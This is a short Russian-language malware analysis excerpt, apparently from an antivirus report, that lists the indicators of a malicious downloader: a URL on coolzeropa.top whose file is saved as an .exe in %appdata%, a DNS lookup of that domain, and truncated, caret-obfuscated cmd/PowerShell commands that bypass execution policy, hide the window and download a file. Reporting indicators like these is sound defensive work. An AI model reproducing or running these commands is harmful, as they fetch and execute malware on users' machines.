Техническая информация
- http://coolzeropa.top/admin.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^WeR^shE^ll^.E^xe^ ^-^ExE^C^Ut^I^on^po^liC^Y ^b^ypA^s^S -Nopr^OF^I^l^E -W^IndoWSt^y^L^E^ ^h^iD^dEn (n^e^W-oBJEc^t^ ^S^YST^eM.^NeT^.we^BCli^E^nt).dowNLoaDFIle(^'http://coolzer...
- DNS ASK co###eropa.top
- '<SYSTEM32>\cmd.exe' /c "pO^WeR^shE^ll^.E^xe^ ^-^ExE^C^Ut^I^on^po^liC^Y ^b^ypA^s^S -Nopr^OF^I^l^E -W^IndoWSt^y^L^E^ ^h^iD^dEn (n^e^W-oBJEc^t^ ^S^YST^eM.^NeT^.we^BCli^E^nt).dowNLoaDFIle(^'http://coolzer...' (со скрытым окном)